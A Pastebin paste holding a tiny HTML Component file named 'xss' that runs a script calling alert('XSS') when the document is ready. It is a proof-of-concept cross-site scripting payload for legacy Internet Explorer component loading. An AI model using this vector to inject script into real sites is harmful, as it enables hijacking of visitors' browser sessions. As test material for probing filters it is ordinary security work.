Guest User

Untitled

a guest
Jul 18th, 2018
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.20 KB | None | 0 0
  1. <PUBLIC:COMPONENT TAGNAME="xss">
  2. <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
  3. </PUBLIC:COMPONENT>
  4. <SCRIPT>
  5. function main()
  6. {
  7. alert("XSS");
  8. }
  9. </SCRIPT>
Add Comment
Please, Sign In to add comment